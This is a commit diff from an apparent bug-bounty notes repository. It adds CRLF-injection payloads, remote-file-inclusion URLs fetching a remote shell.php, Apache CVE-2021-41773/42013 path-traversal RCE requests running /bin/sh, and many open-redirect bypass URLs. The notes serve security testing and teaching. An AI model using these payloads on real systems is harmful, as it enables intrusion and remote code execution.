Add 'Where to find' in each readme, add Apache + CRLF + RFI

This commit is contained in:
Muhammad Daffa 2022-06-22 11:41:21 +07:00
parent fdaf048f40
commit abd025fb64
22 changed files with 211 additions and 25 deletions

View File

@ -1,5 +1,13 @@
# Bypass File Upload # Arbitrary File Upload
1. Change the ContentType
## Introduction
An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server.
## Where to find
In upload file feature, for example upload photo profile feature
## How to exploit
1. Change the `Content-Type` value
``` ```
POST /images/upload/ HTTP/1.1 POST /images/upload/ HTTP/1.1
Host: target.com Host: target.com

View File

@ -3,7 +3,10 @@
## Introduction ## Introduction
Business Logic Errors are ways of using the legitimate processing flow of an application in a way that results in a negative consequence to the organization. Business Logic Errors are ways of using the legitimate processing flow of an application in a way that results in a negative consequence to the organization.
## How to find ## Where to find
This vulnerability can appear in all features of the application.
## How to exploit
1. Review Functionality 1. Review Functionality
- Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product. - Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product.
- Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve. - Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve.

View File

@ -1,4 +1,4 @@
# Bypass Captcha # Bypass Captcha (Google reCAPTCHA)
1. Try changing the request method, for example POST to GET 1. Try changing the request method, for example POST to GET
``` ```

35
CRLF Injection.md Normal file
View File

@ -0,0 +1,35 @@
# CRLF Injection
## Introduction
A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
## Where to find
It can be found anywhere, always check the request and response. Try to search for parameters that lead to redirects, you can see the response is (301, 302, 303, 307, 308).
## How to exploit
1. Basic payload
```
https://example.com/?lang=en%0D%0ALocation:%20https://evil.com/
```
The response is
```
HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 09 May 2016 14:47:29 GMT
Set-Cookie: language=en
Location: https://evil.com/
```
2. Double encode
```
https://example.com/?lang=en%250D%250ALocation:%20https://evil.com/
```
3. Bypass unicode
```
https://example.com/?lang=en%E5%98%8A%E5%98%8DLocation:%20https://evil.com/
```
## References
* [@filedescriptor](https://blog.innerht.ml/twitter-crlf-injection/)
* [EdOverflow](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md)

View File

@ -3,6 +3,9 @@
## Introduction ## Introduction
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
## How to find
Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
## How to exploit ## How to exploit
1. HTML GET Method 1. HTML GET Method
@ -38,3 +41,6 @@ xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xhr.send('{"role":admin}'); xhr.send('{"role":admin}');
</script> </script>
``` ```
5. Multipart request
Soon

View File

@ -12,7 +12,10 @@ Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious s
A type of XSS that has payloads found in the DOM rather than within the HTML code. A type of XSS that has payloads found in the DOM rather than within the HTML code.
## **How to exploit** ## Where to find
This vulnerability can appear in all features of the application. If you want to find Dom-based XSS, you can find it by reading the javascript source code.
## How to exploit
1. Basic payload 1. Basic payload
```html ```html
<script>alert(1)</script> <script>alert(1)</script>

View File

@ -2,8 +2,11 @@
## Introduction ## Introduction
Denial of Service is a type of attack on a service that disrupts its normal function and prevents other users from accessing it Denial of Service is a type of attack on a service that disrupts its normal function and prevents other users from accessing it
## How to FInd
## Where to find
This vulnerability can appear in all features of the application. Depending on how to exploit it, for example in the file upload feature, you can upload very large files
## How to exploit
1. Cookie bomb 1. Cookie bomb
``` ```

View File

@ -3,7 +3,10 @@
## Introduction ## Introduction
Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application. Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.
## How to FInd ## Where to find
`-`
## How to exploit
1. Exposed Git folder 1. Exposed Git folder
``` ```
https://site.com/.git https://site.com/.git

View File

@ -3,6 +3,9 @@
## Introduction ## Introduction
HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks. HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks.
## Where to find
In the feature where the website can send email to us. For example forgot password / newsletter.
## How to exploit ## How to exploit
1. Change the host header 1. Change the host header
``` ```

View File

@ -3,7 +3,11 @@
## Introduction ## Introduction
IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system. IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system.
## How to FInd ## Where to find
- Usually it can be found in APIs.
- Check the HTTP request that contain unique ID, for example `user_id` or `id`
## How to exploit
1. Add parameters onto the endpoints for example, if there was 1. Add parameters onto the endpoints for example, if there was
``` ```
GET /api/v1/getuser GET /api/v1/getuser

View File

@ -1,8 +1,11 @@
## Local File Inclusion ## Local File Inclusion (LFI)
## Introduction ## Introduction
Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server
## Where to find
- Any endpoint that includes a file from a web server. For example, `/index.php?page=index.html`
## How to exploit ## How to exploit
1. Basic payload 1. Basic payload
``` ```

View File

@ -3,7 +3,10 @@
## Introduction ## Introduction
The most infamous OAuth-based vulnerability is when the configuration of the OAuth service itself enables attackers to steal authorization codes or access tokens associated with other users accounts. By stealing a valid code or token, the attacker may be able to access the victim's account. The most infamous OAuth-based vulnerability is when the configuration of the OAuth service itself enables attackers to steal authorization codes or access tokens associated with other users accounts. By stealing a valid code or token, the attacker may be able to access the victim's account.
## How to find ## Where to find
In the SSO feature. For example `Log in with google` or `Log in with facebook`.
## How to exploit
1. OAuth token stealing: Changing redirect_uri to attacker.com(Use IDN Homograph or common bypasses). 1. OAuth token stealing: Changing redirect_uri to attacker.com(Use IDN Homograph or common bypasses).
2. Change Referral header to attacker.com while requesting OAuth. 2. Change Referral header to attacker.com while requesting OAuth.
3. Create an account with victim@gmail.com with normal functionality. Create account with victim@gmail.com using OAuth functionality. Now try to login using previous credentials. 3. Create an account with victim@gmail.com with normal functionality. Create account with victim@gmail.com using OAuth functionality. Now try to login using previous credentials.

View File

@ -3,7 +3,11 @@
## Introduction ## Introduction
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain
## How to Find ## Where to find
- Sometimes it can be found in login / register / logout pages
- Checking the javascript source code
## How to exploit
1. Try change the domain 1. Try change the domain
``` ```
/?redir=evil.com /?redir=evil.com

View File

@ -9,6 +9,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
## List ## List
- [Arbitrary File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Arbitrary%20File%20Upload.md) - [Arbitrary File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Arbitrary%20File%20Upload.md)
- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md) - [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
- [CRLF Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CRLF%20Injection.md)
- [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md) - [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md) - [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md) - [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
@ -17,9 +18,10 @@ These are my bug bounty notes that I have gathered from various sources, you can
- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md) - [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
- [Local File Inclusion (LFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Local%20File%20Inclusion.md) - [Local File Inclusion (LFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Local%20File%20Inclusion.md)
- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md) - [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
- SQL Injection (SOON)
- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md) - [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md) - [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
- [Remote File Inclusion (RFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Remote%20File%20Inclusion.md)
- SQL Injection (SOON)
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md) - [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
## List Bypass ## List Bypass
@ -41,6 +43,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md) - [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
## Technologies ## Technologies
- [Apache (HTTP Server)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Apache%20HTTP%20Server.md)
- [Confluence](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md) - [Confluence](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md)
- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md) - [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md) - [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)

31
Remote File Inclusion.md Normal file
View File

@ -0,0 +1,31 @@
## Remote File Inclusion (RFI)
## Introduction
Remote file inclusion (RFI) is an attack targeting vulnerabilities in web applications that dynamically reference external scripts.
## Where to find
- Any endpoint that includes a file from a web server. For example, `/index.php?page=index.html`
## How to exploit
1. Basic payload
```
http://example.com/index.php?page=http://daffa.info/shell.php
```
2. URL encoding
```
http://example.com/index.php?page=http%3A%2F%2Fdaffa.info%2Fshell.php
```
3. Double encoding
```
http://example.com/index.php?page=http%253A%252F%252Fdaffa.info%252Fshell.php
```
4. Using Null Byte (%00)
```
http://example.com/index.php?page=http://daffa.info/shell.php%00
```
## References
* [payloadbox](https://github.com/payloadbox/rfi-lfi-payload-list)

View File

@ -0,0 +1,42 @@
# Apache (HTTP Server) Common Bugs
## Introduction
What would you do if you came across a website that uses Apache (HTTP Server)?
## How to Detect
Usually in the HTTP response there is a header like this `Server: Apache` or `Server: Apache/2.4.50` and check the 404 page
1. Find the related CVE by checking Apache (HTTP Server) version
* How to find the Apache (HTTP Server) version
By checking the response header or using 404 page, sometimes the version is printed there. If you found outdated Apache (HTTP Server) version, find the CVEs at [CVE Details](https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/Apache-Http-Server.html)
Some example CVE:
- CVE-2021-41773 (RCE and LFI)
```
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close
echo;id
```
- CVE-2021-42013 (RCE and LFI)
```
POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
echo;id
```

View File

@ -4,9 +4,7 @@
What would you do if you came across a website that uses Confluence? What would you do if you came across a website that uses Confluence?
## How to Detect ## How to Detect
``` Try to HTTP request to `https://example.com/login.action?os_destination=%2F` and there is a form login
https://example.com/login.action?os_destination=%2F
```
1. Find the related CVE by checking Confluence version 1. Find the related CVE by checking Confluence version
* How to find the Confluence version * How to find the Confluence version

View File

@ -4,7 +4,7 @@
What would you do if you came across a website that uses HAProxy? What would you do if you came across a website that uses HAProxy?
## How to Detect ## How to Detect
- `-`
1. CVE-2021-40346 (HTTP Request Smuggling) 1. CVE-2021-40346 (HTTP Request Smuggling)
``` ```

View File

@ -4,10 +4,7 @@
What would you do if you came across a website that uses Jira? What would you do if you came across a website that uses Jira?
## How to Detect ## How to Detect
``` Try to HTTP request to `https://example.com/secure/Dashboard.jspa` or `https://example.com/login.jsp` and there is a form login
https://example.com/secure/Dashboard.jspa
https://example.com/login.jsp
```
1. Find the related CVE by checking jira version 1. Find the related CVE by checking jira version
* How to find the jira version * How to find the jira version

View File

@ -21,7 +21,41 @@ https://example.com/folder1/folder2/static../static/main.css
https://example.com/folder1/folder2/static../%s/main.css https://example.com/folder1/folder2/static../%s/main.css
``` ```
3. Nginx status page 3. Open redirect
This is because of misconfiguration
```
https://example.com/%5cevil.com
https://example.com////\;@evil.com
https://example.com////evil.com
https://example.com///evil.com
https://example.com///evil.com/%2f%2e%2e
https://example.com///evil.com@//
https://example.com///{{RootURL}}evil.com/%2f%2e%2e
https://example.com//;@evil.com
https://example.com//\/evil.com/
https://example.com//\@evil.com
https://example.com//\evil.com
https://example.com//\tevil.com/
https://example.com//evil.com/%2F..
https://example.com//evil.com//
https://example.com//evil.com@//
https://example.com//evil.com\tevil.com/
https://example.com//https://evil.com@//
https://example.com/<>//evil.com
https://example.com/\/\/evil.com/
https://example.com/\/evil.com
https://example.com/\evil.com
https://example.com/evil.com
https://example.com/evil.com/%2F..
https://example.com/evil.com/
https://example.com/evil.com/..;/css
https://example.com/https:evil.com
```
4. Nginx status page
``` ```
https://example.com/nginx_status https://example.com/nginx_status
``` ```
## References
- [Detectify](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/)

View File

@ -4,7 +4,7 @@
What would you do if you came across a website that uses Zend? What would you do if you came across a website that uses Zend?
## How to Detect ## How to Detect
- `-`
1. Finding config files 1. Finding config files
``` ```

View File

@ -3,7 +3,10 @@
## Introduction ## Introduction
The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users. The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.
## How to FInd ## Where to find
`-`
## How to exploit
1. Basic poisoning 1. Basic poisoning
``` ```
GET / HTTP/1.1 GET / HTTP/1.1